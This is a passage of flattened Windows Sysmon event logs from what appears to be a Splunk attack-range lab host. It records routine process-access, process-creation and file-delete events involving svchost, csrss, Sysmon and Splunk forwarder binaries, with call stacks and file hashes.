09:18:26.862{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980176Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980175Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980174Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980173Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980172Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980171Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980170Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980169Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8C62-6151-F379-00000000FD01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980168Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.862{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C62-6151-F379-00000000FD01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980167Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.849{69CF5F33-8C62-6151-F379-00000000FD01}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980166Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.846{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D4BEA54FE4EFB4D78E13A97EE1B3885,SHA256=1A9615CAAEBDDC2CFC7F2895915D4AE4F92312911B9C806DD6038D769AFE900D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:26.618{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D86805F12F3F3010785F275C5183CC5,SHA256=4F802CE3DA5AE629588B15D417D72873E4BE69E921F3A60BC626A61D958D0C52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980165Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.409{69CF5F33-8C62-6151-F279-00000000FD01}12482696C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980164Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C62-6151-F279-00000000FD01}1248C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980163Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980162Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980161Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980160Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980159Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980158Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980157Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980156Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980155Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980154Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8C62-6151-F279-00000000FD01}1248C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980153Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.237{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C62-6151-F279-00000000FD01}1248C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980152Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.222{69CF5F33-8C62-6151-F279-00000000FD01}1248C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980151Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:26.034{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 